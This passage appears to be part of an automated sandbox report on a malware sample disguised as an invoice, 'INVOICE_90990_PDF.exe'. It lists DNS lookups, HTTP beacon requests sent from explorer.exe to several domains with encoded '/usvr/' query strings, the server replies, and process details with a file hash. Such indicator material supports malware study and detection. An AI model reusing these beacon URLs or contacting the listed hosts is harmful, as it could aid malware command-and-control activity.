Aug 9, 2021 13:10:08.049309015 CEST	8.8.8.8	192.168.2.5	0xa41f	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Aug 9, 2021 13:10:08.049309015 CEST	8.8.8.8	192.168.2.5	0xa41f	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:13.270809889 CEST	8.8.8.8	192.168.2.5	0x231	No error (0)	www.quranvisor.com		1.1.1.1	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:18.384635925 CEST	8.8.8.8	192.168.2.5	0x5d96	No error (0)	www.unusualdog.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Aug 9, 2021 13:10:18.384635925 CEST	8.8.8.8	192.168.2.5	0x5d96	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:18.384635925 CEST	8.8.8.8	192.168.2.5	0x5d96	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:18.384635925 CEST	8.8.8.8	192.168.2.5	0x5d96	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:18.384635925 CEST	8.8.8.8	192.168.2.5	0x5d96	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:23.788676977 CEST	8.8.8.8	192.168.2.5	0x9a8f	No error (0)	www.microprojects.net		52.20.84.62	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:29.172875881 CEST	8.8.8.8	192.168.2.5	0x7543	No error (0)	www.bavarian-luxury.com		85.13.128.31	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:39.350934029 CEST	8.8.8.8	192.168.2.5	0xbcd8	Server failure (2)	www.priormakers.net	none	none	A (IP address)	IN (0x0001)
Aug 9, 2021 13:10:44.403175116 CEST	8.8.8.8	192.168.2.5	0x461e	No error (0)	www.topelk.com	topelk.com		CNAME (Canonical name)	IN (0x0001)
Aug 9, 2021 13:10:44.403175116 CEST	8.8.8.8	192.168.2.5	0x461e	No error (0)	topelk.com		184.168.131.241	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.zombiguitar.com

www.theblockmeatstore.com

www.quranvisor.com

www.unusualdog.com

www.microprojects.net

www.bavarian-luxury.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49726	81.17.29.150	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:02.960010052 CEST	6055	OUT	GET /usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.zombiguitar.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:02.985369921 CEST	6056	IN	HTTP/1.1 200 OK cache-control: max-age=0, private, must-revalidate connection: close content-length: 589 content-type: text/html; charset=utf-8 date: Mon, 09 Aug 2021 11:10:02 GMT server: nginx set-cookie: sid=582eba9e-f902-11eb-a2ae-d2c2afec561e; path=/; domain=.zombiguitar.com; expires=Sat, 27 Aug 2089 14:24:09 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 6f 6d 62 69 67 75 69 74 61 72 2e 63 6f 6d 2f 75 73 76 72 2f 3f 50 6a 66 38 31 3d 2d 5a 64 64 2d 56 35 68 71 68 4d 34 70 32 53 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 79 4f 44 55 78 4e 44 59 77 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 6a 49 34 4e 54 41 33 4e 44 41 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 57 4e 77 64 47 31 74 61 7a 59 79 4e 58 56 78 5a 6a 42 30 59 6e 4d 77 4d 6d 6c 30 61 57 77 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 6a 67 31 4d 44 63 30 4d 44 49 73 49 6e 52 7a 49 6a 6f 78 4e 6a 49 34 4e 54 41 33 4e 44 41 79 4f 54 63 78 4d 44 6b 30 66 51 2e 64 59 32 56 42 42 61 34 45 6f 46 4e 6e 6f 4e 4c 78 54 39 56 34 48 65 46 31 5f 52 71 41 47 48 41 71 56 69 46 67 66 43 52 6c 6e 34 26 6d 4e 39 64 33 76 46 3d 6d 53 50 4a 70 4f 33 37 69 44 69 25 32 46 4a 4a 4f 74 46 45 42 37 63 50 6f 44 71 2b 72 63 46 45 58 6d 6d 65 67 38 66 25 32 46 25 32 46 57 4c 4c 58 54 39 4d 56 32 7a 38 36 51 6a 56 46 43 25 32 46 47 36 4b 76 4a 6b 4d 51 35 36 25 32 46 26 73 69 64 3d 35 38 32 65 62 61 39 65 2d 66 39 30 32 2d 31 31 65 62 2d 61 32 61 65 2d 64 32 63 32 61 66 65 63 35 36 31 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.zombiguitar.com/usvr/?Pjf81=-Zdd-V5hqhM4p2S&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYyODUxNDYwMiwiaWF0IjoxNjI4NTA3NDAyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycWNwdG1tazYyNXVxZjB0YnMwMml0aWwiLCJuYmYiOjE2Mjg1MDc0MDIsInRzIjoxNjI4NTA3NDAyOTcxMDk0fQ.dY2VBBa4EoFNnoNLxT9V4HeF1_RqAGHAqViFgfCRln4&mN9d3vF=mSPJpO37iDi%2FJJOtFEB7cPoDq+rcFEXmmeg8f%2F%2FWLLXT9MV2z86QjVFC%2FG6KvJkMQ56%2F&sid=582eba9e-f902-11eb-a2ae-d2c2afec561e');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49727	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:08.095585108 CEST	6057	OUT	GET /usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.theblockmeatstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:08.181669950 CEST	6058	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Aug 2021 11:10:08 GMT Content-Length: 0 Connection: close location: https://www.theblockmeatstore.com/usvr?mN9d3vF=Hs%2FL2mJb%2FOvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S strict-transport-security: max-age=120 x-wix-request-id: 1628507408.1188610990128361 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgPdBW8RJ62fx7sKSwU92YH,qquldgcFrj2n046g4RNSVAWQdna/CCWMxoP3LZv2gTtYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRals4++uwHAXQpBhbuvqPxWy3vZv1k+LBTLMg8yyM9xq7C3fKEXQvQlSAkB/lstal9R5fAlRY0jC2L5OGIlRj9B9E=,2UNV7KOq4oGjA5+PKsX47Nx2kHk34KLdLhfaReITlNtYgeUJqUXtid+86vZww+nL,l7Ey5khejq81S7sxGe5Nkw7D1HyO44rvV4Lde0UjaKBXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,UCcefuQCi27dXmJSD6Vpi1qP7Tgu+Vqak21QefUo3ZpF30kdtaNgXD/yU00ghn6OyIcTh1vD7B7Cgnme8qjKMQ== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49730	1.1.1.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:13.291455030 CEST	6077	OUT	GET /usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.quranvisor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:13.325337887 CEST	6078	IN	HTTP/1.1 409 Conflict Date: Mon, 09 Aug 2021 11:10:13 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 67c089651cd242db-FRA Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49731	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:18.498845100 CEST	6079	OUT	GET /usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.unusualdog.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:18.611226082 CEST	6080	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Mon, 09 Aug 2021 11:10:18 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: zvZl3MMB/7K8PFz4j Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Aug 9, 2021 13:10:18.611259937 CEST	6081	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Aug 9, 2021 13:10:18.611285925 CEST	6083	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Aug 9, 2021 13:10:18.611308098 CEST	6083	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Aug 9, 2021 13:10:18.611331940 CEST	6084	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Aug 9, 2021 13:10:18.611357927 CEST	6086	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Aug 9, 2021 13:10:18.611383915 CEST	6087	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Aug 9, 2021 13:10:18.611417055 CEST	6088	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Aug 9, 2021 13:10:18.611445904 CEST	6089	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Aug 9, 2021 13:10:18.611470938 CEST	6091	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Aug 9, 2021 13:10:18.719144106 CEST	6092	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49732	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:23.928457975 CEST	6118	OUT	GET /usvr/?mN9d3vF=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.microprojects.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:24.065283060 CEST	6119	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 09 Aug 2021 11:10:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49733	85.13.128.31	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 9, 2021 13:10:29.212502003 CEST	6120	OUT	GET /usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 Host: www.bavarian-luxury.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 9, 2021 13:10:29.250288963 CEST	6120	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Aug 2021 11:10:29 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: INVOICE_90990_PDF.exe PID: 5748 Parent PID: 5692

General

Start time:	13:08:33
Start date:	09/08/2021
Path:	C:\Users\user\Desktop\INVOICE_90990_PDF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
Imagebase:	0x400000
File size:	304901 bytes
MD5 hash:	3E94BEE073A286E8B446E87A126DDE1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
